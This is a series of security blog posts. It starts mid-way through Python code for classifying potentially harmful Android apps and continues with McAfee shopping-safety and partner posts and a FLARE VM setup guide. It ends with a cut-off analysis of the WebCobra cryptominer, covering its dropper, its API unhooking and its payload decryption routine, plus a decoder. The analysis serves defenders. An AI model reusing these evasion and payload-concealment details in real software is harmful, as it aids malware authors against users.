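    ("dev_d", {"INTERNET", "RECEIVE_SMS", "READ_CONTACTS"}, 2.1, 1),
    ("dev_f", {"INTERNET", "SEND_SMS"}, 2.4, 1),
]

PERMISSIONS = ["SEND_SMS", "RECEIVE_SMS", "READ_CONTACTS", "CAMERA", "INTERNET"]
FEATURES = PERMISSIONS + ["developer_rating"]


def developer_ratings(apps):
    """Engineered feature: mean rating across all apps a developer owns."""
    by_dev = defaultdict(list)
    for dev, _perms, rating, _label in apps:
        by_dev[dev].append(rating)
    return {dev: sum(r) / len(r) for dev, r in by_dev.items()}


def featurize(dev, perms, ratings, default_rating):
    """Permissions become 0/1 flags; the developer rating is centred on the
    scale midpoint (3.0) and scaled to [-1, 1] (assumption of this example)."""
    rating = ratings.get(dev, default_rating)  # unseen developer: global mean
    return [1.0 if p in perms else 0.0 for p in PERMISSIONS] + [(rating - 3.0) / 2.0]


def sigmoid(z):
    # Numerically stable form for large |z|.
    if z >= 0:
        return 1.0 / (1.0 + math.exp(-z))
    e = math.exp(z)
    return e / (1.0 + e)


def train(rows, labels, lr=0.5, steps=3000):
    """Batch gradient descent on mean log-loss; zero init, so deterministic."""
    n, d = len(rows), len(rows[0])
    w, b = [0.0] * d, 0.0
    for _ in range(steps):
        gw, gb = [0.0] * d, 0.0
        for x, y in zip(rows, labels):
            err = sigmoid(b + sum(wi * xi for wi, xi in zip(w, x))) - y
            gb += err
            for j in range(d):
                gw[j] += err * x[j]
        b -= lr * gb / n
        w = [wi - lr * g / n for wi, g in zip(w, gw)]
    return w, b


def build_model(apps=APPS):
    """Return (feature -> weight, scoring function) trained on `apps`."""
    ratings = developer_ratings(apps)
    default = sum(ratings.values()) / len(ratings)
    rows = [featurize(dev, perms, ratings, default) for dev, perms, _r, _y in apps]
    w, b = train(rows, [app[3] for app in apps])

    def score(dev, perms):
        """Estimated probability that a new submission is a PHA."""
        x = featurize(dev, perms, ratings, default)
        return sigmoid(b + sum(wi * xi for wi, xi in zip(w, x)))

    return dict(zip(FEATURES, w)), score


def ranked_weights(weights):
    """Features ordered by absolute weight, the view used to judge importance."""
    return sorted(weights.items(), key=lambda kv: abs(kv[1]), reverse=True)


if __name__ == "__main__":
    weights, score = build_model()
    for name, value in ranked_weights(weights):
        # INTERNET is requested by every sample, so it carries no signal and
        # simply shares the intercept with the bias term.
        print(f"{name:17s} {value:+.2f}")
    print("new app from dev_c:", round(score("dev_c", {"INTERNET", "SEND_SMS"}), 3))
    print("new app from dev_a:", round(score("dev_a", {"INTERNET", "CAMERA"}), 3))
```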

For more complex cases, we employ deep learning. Compared to logistic regression, deep learning is good at capturing complicated interactions between different features and extracting hidden patterns. The millions of apps in Google Play provide a rich dataset, which is advantageous to deep learning.

In addition to our targeted feature engineering efforts, we experiment with many aspects of deep neural networks. For example, a deep neural network can have multiple layers and each layer has several neurons to process signals. We can experiment with the number of layers and neurons per layer to change model behaviors.

We also adopt unsupervised machine learning methods. Many PHAs use similar abuse techniques and tricks, so they look almost identical to each other. An unsupervised approach helps define clusters of apps that look or behave similarly, which allows us to mitigate and identify PHAs more effectively. We can automate the process of categorizing that type of app if we are confident in the model or can request help from a human expert to validate what the model found.

PHAs are constantly evolving, so our models need constant updating and monitoring. In production, models are fed with data from recent apps, which helps them stay relevant. However, new abuse techniques and behaviors need to be continuously detected and fed into our machine learning models to be able to catch new PHAs and stay on top of recent trends. This is a continuous cycle of model creation and updating that also requires tuning to ensure that the precision and coverage of the system as a whole matches our detection goals.

Looking forward

As part of Google's AI-first strategy, our work leverages many machine learning resources across the company, such as tools and infrastructures developed by Google Brain and Google Research. In 2017, our machine learning models successfully detected 60.3% of PHAs identified by Google Play Protect, covering over 2 billion Android devices. We continue to research and invest in machine learning to scale and simplify the detection of PHAs in the Android ecosystem.

Acknowledgements

This work was developed in joint collaboration with Google Play Protect, Safe Browsing and Play Abuse teams with contributions from Andrew Ahn, Hrishikesh Aradhye, Daniel Bali, Hongji Bao, Yajie Hu, Arthur Kaiser, Elena Kovakina, Salvador Mandujano, Melinda Miller, Rahul Mishra, Sebastian Porst, Monirul Sharif, Sri Somanchi, Sai Deep Tetali, and Zhikun Wang.

The Open Source Conundrum

If you’ve read or watched the news at all in the last five years, you know that securing software is challenging. And in today’s world, developers are shouldering a big part of this challenge. Here lies the conundrum. Developers are in the best position to secure code, but security is often not one of their priorities. With the shift to DevOps in recent years, development is all about speed of delivery, which means moving quickly and relying on open source code, and which often comes into conflict with the goals of security. In many cases, this has led to a “patch and pray” model – where organizations patch vulnerabilities when they hear about them, and then pray it wasn’t exploited in the window between discovery and patching. But this doesn’t have to be the case. We can take advantage of open source libraries and move at the speed of DevOps without relying solely on a reactive security model.

However, we do need to acknowledge that open source has changed the security game. Just the sheer numbers are landscape-altering. At SourceClear, we’ve found that most companies have more open source code than internally developed code – in many instances, in fact, the open source share is up to 90 percent. In terms of security, this means that the attack surface has changed dramatically. In this environment, it becomes critical to ask four questions:

1. What open source code are you using? (Hint: It’s more than you think.)

2. Where did it come from? Should I trust it?

3. What does it do?

4. What vulnerabilities are present?

Ultimately, control over what is in your code has changed. Today, you need new security solutions to reduce risk in this new environment.

Join me in person this month to dig further into this problem, and its solutions. I’m hitting the road for our “Open Source Conundrum” roadshow beginning November 27. Find out when I’ll be in a city near you, and stop by to network with peers and get some solid advice on this challenging security issue.

2018 Americas Partner Summit

The Americas Partner Summit 2018 was held on Tuesday, October 16 at MPOWER Cybersecurity Summit. It was a day filled with McAfee and partner leadership coming together to collaborate on McAfee’s partner strategy, product portfolio, programs, and more. Here are some of the highlights:

The Audience

  • 338 partners
    • 225 VAR, Disti, MSP, etc.
    • 35 OEM
    • 78 SIA
  • 28% Executive-Level
  • 46% Director-Level
  • 26% Technical or Consultant-Level

McAfee Partner of the Year Awards

I invited the McAfee leadership team to the stage and we recognized 25 partners with awards for excellence and innovation in security. We welcomed DJ Miss Ninja to have some fun while we celebrated this elite group of partners for the work they’ve accomplished through innovative solutions for better customer outcomes, selling into net new logo accounts, and more. You can view the full list of winners here.

Create the Possible

As you know, McAfee has a vast ecosystem of partners – professional services, solution providers, service providers/systems integrators, original equipment manufacturers, security innovation alliance, and distribution. In 2017, I challenged you, our partner community, to collaborate with each other, and with McAfee, to deliver innovative solutions for better customer outcomes. And, wow did you deliver! Throughout the day, we showed seven short videos highlighting the innovation from unique partners in the Americas. Thank you to the partners who stepped out to document their success. The work that the McAfee Partner community has delivered in the last year is truly a testament that we can Create the Possible when we work together.

Key Takeaways

Partners heard program, product, and corporate strategy from our C-Level executives, and had the opportunity to dig deeper into the information through ample Q&A throughout the day. While we took numerous questions from the audience, our executives had some key calls to action from the partners.

To read about the key takeaways, download the slides from the various presentations, etc. please click here to visit the partner portal Partner Summit 2018 page.

To Summarize

Partner Summit is where our partners go beyond the keynotes. Innovation, collaboration, and momentum are what will allow us to Create the Possible. The annual Partner Summit event provides a space where McAfee and McAfee Partners come together to build momentum to get us to the next possibility.

If you were unable to attend, I hope to see you next year. If you attended, I sincerely thank you and hope you walked away with action items that we can accomplish together.

Let’s go create the possible! Together is power.

The post 2018 Americas Partner Summit appeared first on McAfee Blogs.

Holiday Stress Can Make You More Careless Online

Holiday stress. Every year, come November, my resting heart rate starts to rise: the festive season is approaching. Not only is there so much to do but there’s so much to spend money on. There are presents to purchase, feasts to prepare and party outfits to buy. Throw in a holiday to fill the long Summer break, and both the credit cards and my stress levels are starting to rapidly increase!

Holiday Financial Stress Results in Poor Decision Making Online

But did you know that this stress can affect our online safety? Research conducted by McAfee shows that almost 80% of us believe the holiday period causes financial stress. And nearly half of us (46%) believe the stress of the holiday season can cause us to behave carelessly online.  Risky behaviours can put our online safety at risk. For instance, using public Wi-Fi to snag a last-minute purchase. Or buying something from an unfamiliar website because it’s cheaper.

Aussie Shoppers Love an Online Bargain 

In 2017, Aussies spent a record $21.3 million online – a whopping 19% increase over 2016. McAfee’s research shows that Aussie consumers love securing a bargain online – who doesn’t!! But many will seek out a great deal even if it means potentially jeopardising their online safety. The research shows that 64% of consumers are willing to use an unfamiliar website if it means they can save money on their purchase. Even more concerning, a third of Aussies admitted to clicking links in suspicious emails for better deals!! Yikes!!

The Thing Is, Cyber Criminals Love Your Holiday Shopping Too

Cyber criminals work very hard to take advantage of us during the busy Holiday season. They come up with all sorts of ingenious ways to target time-poor and budget-conscious consumers online. They know very well that many of us will cut corners with our online security. Particularly if we think we can save money on presents, outfits or even a holiday.

And they scheme accordingly: charity phishing emails, fake online stores, bogus delivery emails, e-voucher scams and more. Cyber criminals have tried and tested strategies to either steal our personal information or our identity.

How You Can Stay Safe While Shopping Online This Holiday Season

So, don’t feel like you need to battle the crowds at Westfield this festive season. You can still shop online safely if you follow a few simple steps:

  1. Connect with Caution

Public Wi-Fi is just so convenient, but it is a risky business. Users could unknowingly share their personal information with cyber criminals who are snooping on the network. So, if you absolutely have to use public Wi-Fi for a great online shopping deal, always use a Virtual Private Network (VPN) such as McAfee Safe Connect which creates a bank-grade encrypted connection.

  2. Think Before You Click

One of the easiest ways for a cyber criminal to target victims is using phishing emails to trick consumers into sharing their personal information. Phishing emails could be disguised as holiday savings or even a shopping notification. Instead of clicking on a link in an email, always check directly with the source to verify an offer or shipment.

  3. Always Shop with Security Protection

Shopping online without security protection is like driving without a seat belt – dangerous! Comprehensive antivirus software like McAfee Total Protection will help shield your devices against malware, phishing attacks and other threats. It also provides a firewall, an anti-spam function, parental controls and a password management tool. A complete no-brainer!

But this year, I’m going to commit to lowering my stress. That way I can really enjoy my time with my family and friends. To get ahead of the game I plan to:

  • Start my online shopping earlier so I don’t ‘cut corners’ with my online safety,
  • Create a realistic budget, and
  • Start filling my freezer with some holiday food – now

And most importantly, get that resting heart rate under control!!

Happy Holidays Everyone!

Alex xx

The post Holiday Stress Can Make You More Careless Online appeared first on McAfee Blogs.

Preventing WebCobra Malware From Slithering Onto Your System

Cryptocurrency mining is the way transactions are verified and added to the public ledger, a database of all the transactions made around a particular piece of cryptocurrency. Cryptocurrency miners compile all of these transactions into blocks and try to solve complicated mathematical problems to compete with other miners for bitcoins. To do this, miners need a ton of computer resources, since successful bitcoin mining requires a large amount of hardware. Unfortunately, these miners can be used for more nefarious purposes if they’re included within malicious software. Enter WebCobra, a malware that exploits victims’ computers to help cybercriminals mine for cryptocurrencies, a method also known as cryptojacking.

How does WebCobra malware work, exactly? First, WebCobra uses droppers (Trojans designed to install malware onto a victim’s device) to check the computer’s system. The droppers let the malware know which cryptocurrency miner to launch. Then, it silently slithers onto a victim’s device via rogue PUP (potentially unwanted program) and installs one of two miners: Cryptonight or Claymore’s Zcash. Depending on the miner, it will drain the victim’s device of its computer processor’s resources or install malicious file folders that are difficult to find.

The most threatening part of WebCobra malware is that it can be very difficult to detect. Often, the only sign of its presence is decreased computer performance. Plus, when the dropper is scanning the victim’s device, it will also check for security products running on the system. Many security products use APIs, or application programming interfaces, to monitor malware behavior – and WebCobra is able to overwrite some. This means it can essentially unhook the API and disrupt the system’s communication methods, and therefore remain undetected for a long time.

While cryptocurrency mining can be a harmless hobby, users should be cautious of criminal miners with poor intentions. So, what can you do to prevent WebCobra from slithering onto your system? Check out the following tips:

  • If your computer slows down, be cautious. It can be hard to determine if your device is being used for a cryptojacking campaign. One way you can identify the attack – poor performance. If your device is slow or acting strange, start investigating and see if your device may be infected with malware.
  • Use a comprehensive security solution. Having your device infected with malware will not only slow down its performance but could potentially lead to exposed data. To secure your device and help keep your system running smoothly and safely, use a program like McAfee Total Protection. McAfee products are confirmed to detect WebCobra.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Preventing WebCobra Malware From Slithering Onto Your System appeared first on McAfee Blogs.

FLARE VM Update

FLARE VM is the first-of-its-kind reverse engineering and malware analysis distribution on the Windows platform. Since its introduction in July 2017, FLARE VM has been continuously trusted and used by many reverse engineers, malware analysts, and security researchers as their go-to environment for analyzing malware. Just like the ever-evolving security industry, FLARE VM has gone through many major changes to better support our users’ needs. FLARE VM now has a new installation, upgrade, and uninstallation process, which is a long-anticipated feature requested by our users. FLARE VM also includes many new tools such as IDA 7.0, radare and YARA. Therefore, we would like to share these updates, especially the new installation process.

Installation

We strongly recommend you use FLARE VM within a virtualized environment for malware analysis to protect and isolate your physical device and network from malicious activities. We assume you already have experience setting up and configuring your own virtualized environment. Please create a new virtual machine (VM) and perform a fresh installation of Windows. FLARE VM is designed to be installed on Windows 7 Service Pack 1 or newer; therefore, you can select a version of Windows that best suits your needs. From this point forward, all installation steps should be performed within your VM.

Once you have a VM with a fresh installation of Windows, use one of the following URLs to download the compressed FLARE VM repository onto your VM:

  • https://github.com/fireeye/flare-vm
  • https://flarevm.info


Figure 1: Download FLARE VM repo

Then, use the following steps to install FLARE VM:

  1. Decompress the FLARE VM repository to a directory of your choosing.
  2. Start a new session of PowerShell with escalated privileges. FLARE VM attempts to install additional software and modify system settings; therefore, escalated privileges are required for installation.
  3. Within PowerShell, change directory to the location where you have decompressed the FLARE VM repository.
  4. Enable unrestricted execution policy for PowerShell by executing the following command and answering “Y” when prompted by PowerShell: Set-ExecutionPolicy unrestricted
  5. Execute the install.ps1 installation script. You will be prompted to enter the current user’s password. FLARE VM needs the current user’s password to automatically login after a reboot when installing. Optionally, you can specify the current user’s password by passing the “-password <current_user_password>” at the command line.


Figure 2: Start PowerShell as administrator


Figure 3: Ready to install FLARE VM

The rest of the installation process is fully automated. Depending upon your internet speed the entire installation may take up to one hour to finish. The VM also reboots multiple times due to the numerous software installations’ requirements. Once the installation completes, the PowerShell prompt remains open waiting for you to hit any key before exiting. After completing the installation, you will be presented with the following desktop environment:


Figure 4: FLARE VM installation completes

Congratulations! You have successfully installed FLARE VM. At this point we recommend you power off the VM, switch the VM networking mode to Host-Only, and then take a snapshot to save a clean state of your analysis VM.

Improvement

The biggest improvement for FLARE VM is the ability to perform a proper update and uninstallation. The older version of FLARE VM came as a PowerShell script to install many chocolatey packages, one at a time; therefore, we were unable to include new packages when updating FLARE VM. In the past, our users had to reinstall FLARE VM completely, which is time consuming, or manually install the new package, which is error prone. To solve this issue, we have converted FLARE VM itself into a chocolatey package. Whenever a new tool is available we will also release a new version of FLARE VM. With this new design we can simply execute “choco upgrade all” to get the newest version of FLARE VM along with any new packages we have released. You can also safely uninstall all FLARE VM packages by executing “choco uninstall flarevm.installer.flare”.

Our new FLARE VM is also updated to use Python 3.7 as the default Python interpreter. As a result, many Python scripts may fail to execute. To maintain support for older scripts, we keep Python 2.7 installed in parallel with Python 3.7. We can easily switch between different versions by using the Python launcher. Run “py -2.7 <path_to_python_script>” to use Python 2.7, or “py <path_to_python_script>” to use the default Python 3.7 interpreter. For more details on the Python launcher, please refer to the following URL: https://docs.python.org/3/using/windows.html#launcher.

Additionally, the new FLARE VM changes the location where Fakenet-NG saves its output when launched via the shortcut in the FLARE folder or taskbar pin. Instead of saving directly to the desktop, to reduce clutter, Fakenet-NG will store all its output in “Desktop\fakenet_logs”.

Compared to older versions this version of FLARE VM comes with many new tools and software packages. Most notably, this release adds the following:

  • IDA Free 7.0
  • radare2 to support 64-bit disassembly
  • The labs for the Practical Malware Analysis book
  • pdfid, pdf-parser, and PdfStreamdumper to analyze malicious PDF documents
  • The Malcode Analyst Pack
  • Yara for signature matching
  • The Cygwin Linux environment on Windows
  • PowerShell transcription and script block logging
    • PowerShell transcripts can be found in “Desktop\PS_Transcripts”

Available Packages

While we attempt to make the tools available as shortcuts within the FLARE folder, there are several available from command-line only. Please see the online documentation for the most up to date list. Here is an incomplete list of some major tools available on FLARE VM:

  • Disassemblers:
    • IDA Free 5.0 and IDA Free 7.0
    • Binary Ninja
    • Radare2 and Cutter
  • Debuggers:
    • OllyDbg and OllyDbg2
    • x64dbg
    • Windbg
  • File Format parser:
    • CFF Explorer, PEView, PEStudio
    • PdfStreamdumper, pdf-parser, pdfid
    • ffdec
    • offvis and officemalscanner
    • PE-bear
  • Decompilers:
    • RetDec
    • Jd-gui and bytecode-viewer
    • dnSpy
    • IDR
    • VBDecompiler
    • Py2ExeDecompiler
  • Monitoring tools:
    • SysInternal suite
    • RegShot
  • Utilities:
    • Hex Editors (010 editor, HxD and File Insight)
    • FLOSS (FireEye Labs Obfuscated String Solver)
    • Fakenet-NG
    • Yara
    • Malware Analyst Pack

Conclusion

The FLARE team continues to support and improve FLARE VM to be the de facto distribution for security research, incident response, and malware analysis on the Windows platform. We greatly appreciate the numerous bug reports, tool requests, and feature recommendations from everyone. We hope FLARE VM, along with many other FLARE open source projects, can help you do your work better, easier, and faster.

We are always looking for talented folks to join our team. The FLARE Team may be a good place for you if:

  • You eat, sleep, and speak disassembly and malware all day long.
  • You would like to push the state of the art for reverse engineering and malware analysis.

Please check out our careers page, or send us an email. Happy Reversing!

Why Traditional Database Security Doesn’t Protect Data

If we asked database administrators, security teams, and risk teams about their definition of what database security is, the answers would vary widely.

Each team views the definition based on their own requirements, but the one answer that most likely won’t appear is: “To protect data.”

Traditionally, database security has always been seen as a means to protect the database systems from vulnerabilities, missing patches, simple misconfigurations, or SQL injections. While this certainly holds true in today’s environments too, we cannot ignore the fact that requirements for securing a company’s most valuable asset—its data—have changed.

Adding data to database security

With the increase in regulatory compliance requirements such as PCI-DSS, HIPAA, SOX, and GDPR, enterprises are asking more and more from their data protection solutions. Data is seen as the new oil—a way to fuel companies. Protecting data must be at the core of every strategy. Where better to start than the one place most data resides, the database?

Database security solutions in today’s data- and compliance-driven environments must not only allow companies to measure the level of security of their databases but must provide the ability to locate personal identifiable data, business critical data, and any other data that is of value to the organization.

In addition, any data that is discovered must be monitored, in real time, 24/7. Long gone are the days when audit logs were sufficient or simple network monitoring was considered adequate. Data is the world’s greatest asset and companies must invest in protecting their own data as well as their customers’ data.

As-a-service: a world of shared responsibilities

Database(s)-as-a-service is one of the fastest growing markets within the world of cloud. It provides organizations with unparalleled amounts of scalability and compute power while at the same time removing many of the challenges that we would see as traditionally related to database security (vulnerability and patch management, for example). In the shared responsibility world of the cloud, the one constant is data. Customers are always responsible for protecting and monitoring their data.

Too many data breaches are successful because the exfiltration of data was made possible by either very little or no real-time monitoring of the data. Traditional database security is not designed to protect data, it’s designed to protect the database from malicious SQL injections or vulnerabilities. One might argue that is data protection. But in reality, database security in today’s data-driven environments must allow organizations to monitor anyone and anything that accesses the “crown jewels,” in real time, with the ability to stop unauthorized access to data.

McAfee helps fill that gap by offering software-based database security solutions that allow the monitoring of database instances across both on-premises solutions and the cloud. Non-intrusive, lightweight, and easy to deploy, McAfee database security solutions allow customers to enjoy all the benefits of moving to a hybrid cloud enterprise database environment while retaining control over security, risk, and data protection.

For more information, visit the database security product information page.

The post Why Traditional Database Security Doesn’t Protect Data appeared first on McAfee Blogs.

Be the Child On Children’s Day – Try Out Role Reversal To Build Better Bonds With Your Kids

November 14th is a day children in India keenly look forward to. Schools and neighbourhoods gear up to make the day a memorable one for the children; TV channels run continuous children’s special serials and movies and there is no pressure at home to study.

At the Facebook Safety Summit panel discussion, where I recently participated, a lady from the audience expressed her inability to understand her teen. They seemed to be living in different dimensions! I suggested she work with him to help her become tech-savvy.

One Teacher’s Day program that was a great hit in my school was when teachers pretended to be students and presented a farce. The children just loved it! Why can’t we do this at home sometimes?

There will always be situations when children would need to be reminded of their boundaries and you need to put on your parent-mantle and say, “Because I said so!” Parents need to be both firm and loving. But what if you are in uncharted territories like the digital world? Where your knowledge of the latest social media developments is limited compared to that of your children? How can you establish yourself as an authority your children will respect, obey and turn to for guidance if you are not digitally literate? Who will you turn to for cyber surfing tips?

Your children.

Yes, you heard that right. Turn the table around and be the student for a change. Let your kids teach you about the digital world. You can encourage them by asking about security, privacy, cyberbullying, fake news, risky games and other topics that concern you. Check out how they download apps. Be prepared for some amazing conversations and insights into their digital hygiene awareness. You will know whether they are mature enough to handle tricky situations. If you buy a new device, consult them on securing it and activating 2-factor authentication.

Benefits of digital role reversals

  1. Set an example: Children learn a lot by observing their parents. So, if you don’t hesitate to ask them when in doubt, they wouldn’t either. Also, if parents practice digital balance, kids will usually follow suit.
  2. Promote mutual understanding, trust and respect: Commend your kids when they share valuable tips. Your words would act like an instant confidence booster and make them feel all grown-up and responsible.
  3. Extend real life education to cover the digital one: You can establish this during your conversations about how you think real-world life-skill lessons apply to the virtual space. Talk about peer pressure, good manners, diplomacy, etiquette, etc. to drive home the point.
  4. Better understanding of child’s digital world: Think about all that you can learn! You have first-hand knowledge of the apps they use and can later Google them to learn more about associated risks, if any. You get an idea about what’s trending, the new online threats and also what interests your kids and how they spend time online.
  5. Opportunity to test their cyber security awareness: Dig deep to get to know how kids secure their accounts and the content they create. Also, have a detailed chat about the merits of using licensed security tools vis-à-vis a free basic one. This lesson will last them a lifetime and ensure their online safety so spend time on this on a regular basis.

This Children’s Day, try out a bit of role reversal and pick up tips on being a savvy digital citizen from your kids. Not only will they feel proud of helping you become a smart device user, you also get to understand how they view digital media, online friendship, cyber safety and data privacy. With one stroke, you will both empower your kids and also strengthen your bonds with them. You are, without doubt, your children’s best teacher and well-wisher. So, with their interest at heart, be the kid sometime.

Happy Children’s Day to all your precious angels.

The post Be the Child On Children’s Day – Try Out Role Reversal To Build Better Bonds With Your Kids appeared first on McAfee Blogs.

The Top Cyber Security Threats Facing Enterprises in 2019

The top cyber security threats your organization may encounter in 2019

The cyber threat environment is becoming more dangerous every day. A recent survey by the World Economic Forum revealed that cyber-attacks were the number-one concern of executives in Europe and other advanced economies. As we approach the winter holidays and the end of the…

The post The Top Cyber Security Threats Facing Enterprises in 2019 appeared first on .

Eraser – Windows Secure Erase Hard Drive Wiper

Eraser is a hard drive wiper for Windows which allows you to run a secure erase and completely remove sensitive data from your hard drive by overwriting it several times with carefully selected patterns.

Eraser is a Windows-focused hard drive wiper and is currently supported under Windows XP (with Service Pack 3), Windows Server 2003 (with Service Pack 2), Windows Vista, Windows Server 2008, Windows 7, 8, 10 and Windows Server 2012.

Read the rest of Eraser – Windows Secure Erase Hard Drive Wiper now! Only available at Darknet.

DisruptOps: Something You Probably Should Include When Building Your Next Threat Models

We are working on our threat modeling here at DisruptOps and I decided to refresh my knowledge of different approaches. One thing that quickly stood out is that nearly none of the threat modeling documentation or tools I’ve seen cover the CI/CD pipeline.

Read the full post at DisruptOps

- Rich

Shop till You’re Hacked? 3 Tips to Stay Secure this Holiday Season

With just days until Black Friday, the unofficial kickoff to the holiday shopping season is quickly approaching. In anticipation of the busiest time of year for e-commerce, this year we conducted a survey, Stressed Holiday Online Shopping, to understand how financial pressure can impact buyer behavior when it comes to online purchasing and cybersecurity. Let’s take a look at what we can learn from the key findings we garnered from surveying 2,472 adults in the U.S. between the ages of 18 and 55, dive into how the results can help consumers avoid the common pitfalls of holiday shopping and cybersecurity, and learn how they can protect both their devices and digital lives this season.

Deals, deals, deals! When it comes to online shopping, consumers care about saving money

The economic burden of the holidays is something consumers know all too well. With an onslaught of holidays and parties in which gifts are expected for family, friends, or co-workers, it’s no wonder that 79 percent of survey respondents said that holiday shopping puts financial stress on them and/or their families. No doubt, from stretching a budget and bargain shopping to attempting to purchase several perfect gifts when sales are fleeting, browsing and purchasing for the holidays can feel overwhelming, which may be why 53 percent of respondents shared that stress can lead them to be careless when online shopping.

More than half of consumers (56 percent) said that they would use a website they were unfamiliar with if it meant they would save money, while 51 percent shared they would purchase an item from an untrusted online retailer to get a good deal. Thirty-one percent would click on a link in an email to get a bargain, regardless of whether they were familiar with the sender.

This season, many will make online purchases, many will use their phones to do so, and even more will unknowingly put themselves at risk when it comes to cybersecurity

When a good deal pops up, it’s hard to pass up – whether you’re in a tricky financial situation or not. This especially rings true when it comes to mobile purchases. The convenience of our phones – which are always with us – lends itself to taking advantage of deals and flash sales that pop up to make impulsive purchases. This always-on access also paves the way for the path to purchase to be much faster and to occur more often.

Perhaps the accessibility that mobile provides is why this holiday season, e-commerce industry experts are predicting that for the first time ever, more online purchases will be made with mobile phones than any other device. That’s right; rather than reach for a laptop or tablet or call out to our virtual assistants, 68 percent of e-commerce visits will be made from our smartphones that are always by our side – whether we’re in a secure setting or not. In fact, 22 percent of McAfee survey respondents shared that they would make online purchases over public or unsecured Wi-Fi, which could potentially expose their private information and payment details.

Our survey also found that while only 6 percent of respondents would be willing to risk having their bank account details fall into the wrong hands for a good deal, 39 percent would risk sharing their email address, 25 percent would wager their phone number, and 16 percent would provide their home address. The problem with this mentality is that through common attacks like phishing, it takes only a bit of information to lead a hacker to gain more of your personal information under the right circumstances. These results illustrate that when it comes to shopping online – regardless of device type – consumers are in it for the holiday deals while unknowingly ignoring their cybersecurity in the process.

Consumers use a variety of ways to discern whether a site or content is unsafe, but rarely report phishing

Fortunately, most people aren’t completely throwing caution to the wind in terms of cybersecurity. Our survey found that consumers use a variety of tricks to scrutinize a website or email in order to interpret safety and danger signals. Half of the respondents check the website design to make sure it looks professional, and 49 percent check for spelling and grammar.

However, 14 percent shared they had no idea how to verify a website and wouldn’t know where to start. Similarly, many people are unfamiliar with how to discern a fake mobile app from an official one, which is troubling, since last year it was reported that one in 25 Black Friday apps were fake, with at least 15 malicious Black Friday apps for each of the top five U.S. e-commerce brands.

Tips to Stay Safe While Online Shopping This Year

Between the impact of stress on online behavior and constantly evolving cyberthreats, it’s clear that there is a need for re-education on how to stay safe online, especially as cybercriminals are becoming smarter and more relentless. This holiday season, before you whip out those credit cards and mobile devices, consider these tips:

  • Always connect with caution. Public Wi-Fi might seem like a good idea, but if you are not careful, you could unknowingly be exposing personal information or credit card details to cybercriminals who are snooping on the network. If you have to conduct transactions on a public Wi-Fi connection, use a virtual private network (VPN) such as McAfee® SafeConnect to help keep your connection secure.
  • Think before you click. One of the easiest ways for a cybercriminal to compromise your system is by using phishing emails to lure consumers into clicking links for products or services that could lead to malware, or a phony website designed to steal personal information. If the deal seems too good to be true, or the email was not expected, it’s always best to check directly with the source.
  • Browse with security protection. Use comprehensive security protection, like McAfee Total Protection, which can help keep devices protected against malware, phishing attacks, and other threats. It includes McAfee WebAdvisor which can help identify malicious websites.

Starving for more stats? Check out last year’s survey on hackable holiday gifts. Stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post Shop till You’re Hacked? 3 Tips to Stay Secure this Holiday Season appeared first on McAfee Blogs.

WebCobra Malware Uses Victims’ Computers to Mine Cryptocurrency

The authors thank their colleagues Oliver Devane and Deepak Setty for their help with this analysis.

McAfee Labs researchers have discovered new Russian malware, dubbed WebCobra, which harnesses victims’ computing power to mine for cryptocurrencies.

Coin mining malware is difficult to detect. Once a machine is compromised, a malicious app runs silently in the background with just one sign: performance degradation. As the malware increases power consumption, the machine slows down, leaving the owner with a headache and an unwelcome bill, as the energy it takes to mine a single bitcoin can cost from $531 to $26,170, according to a recent report.

The increase in the value of cryptocurrencies has inspired cybercriminals to employ malware that steals machine resources to mine crypto coins without the victims’ consent.

The following chart shows how the prevalence of miner malware follows changes in the price of Monero cryptocurrency.

Figure 1: The price of cryptocurrency Monero peaked at the beginning of 2018. The total samples of coin miner malware continue to grow. Source: https://coinmarketcap.com/currencies/monero/.

McAfee Labs has previously analyzed the cryptocurrency file infector CoinMiner; and the Cyber Threat Alliance, with major assistance from McAfee, has published a report, “The Illicit Cryptocurrency Mining Threat.” Recently we examined the Russian application WebCobra, which silently drops and installs the Cryptonight miner or Claymore’s Zcash miner, depending on the architecture WebCobra finds. McAfee products detect and protect against this threat.

We believe this threat arrives via rogue PUP installers. We have observed it across the globe, with the highest number of infections in Brazil, South Africa, and the United States.

Figure 2: McAfee Labs heat map of WebCobra infections from September 9–13.

This cryptocurrency mining malware is uncommon in that it drops a different miner depending on the configuration of the machine it infects. We will discuss that detail later in this post.

Behavior

The main dropper is a Microsoft installer that checks the running environment. On x86 systems, it injects Cryptonight miner code into a running process and launches a process monitor. On x64 systems, it checks the GPU configuration and downloads and executes Claymore’s Zcash miner from a remote server.

Figure 3: WebCobra’s installation window.

After launching, the malware drops and unzips a password-protected Cabinet archive file with this command:

Figure 4: The command to unzip the dropped file.

The CAB file contains two files:

  • ERDNT.LOC: A DLL file to decrypt data.bin
  • data.bin: Contains the encrypted malicious payload

The CAB file uses the following script to execute ERDNT.LOC:

Figure 5: The script to load the DLL file, ERDNT.LOC.

ERDNT.LOC decrypts data.bin and passes the execution flow to it with this routine:

  • [PlainText_Byte] = (([EncryptedData_Byte] + 0x2E) ^ 0x2E) + 0x2E

Figure 6: The decryption routine. 
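The byte transform above, written out for an analyst who has recovered a data.bin sample. This is an added example, not McAfee's code or the malware's own; it assumes each step wraps at 8 bits, and the "MZ" sample is a constructed stand-in, since the page does not state the payload's format.

```python
# Added illustration of the ERDNT.LOC routine quoted above:
#   plain = ((enc + 0x2E) ^ 0x2E) + 0x2E
KEY = 0x2E  # the one constant used in all three steps


def decrypt_byte(b: int) -> int:
    """Apply the routine to one byte, truncating each step to 8 bits
    (assumption: the original works on byte-sized values)."""
    step1 = (b + KEY) & 0xFF
    step2 = step1 ^ KEY
    return (step2 + KEY) & 0xFF


# The routine has no position-dependent state, so it is a fixed byte
# substitution: compute all 256 outputs once and decode with translate().
DECRYPT_TABLE = bytes(decrypt_byte(b) for b in range(256))


def decrypt(data: bytes) -> bytes:
    """Decode a whole buffer (for example, the contents of data.bin)."""
    return data.translate(DECRYPT_TABLE)


def is_bijection() -> bool:
    """True when every plaintext byte has exactly one encrypted form."""
    return len(set(DECRYPT_TABLE)) == 256


def encrypted_form(plain: bytes) -> bytes:
    """Invert the table: how a known plaintext would look inside the
    encrypted file. Useful for deriving a static signature from an
    expected header or string without decoding every candidate file."""
    inverse = bytearray(256)
    for enc, dec in enumerate(DECRYPT_TABLE):
        inverse[dec] = enc
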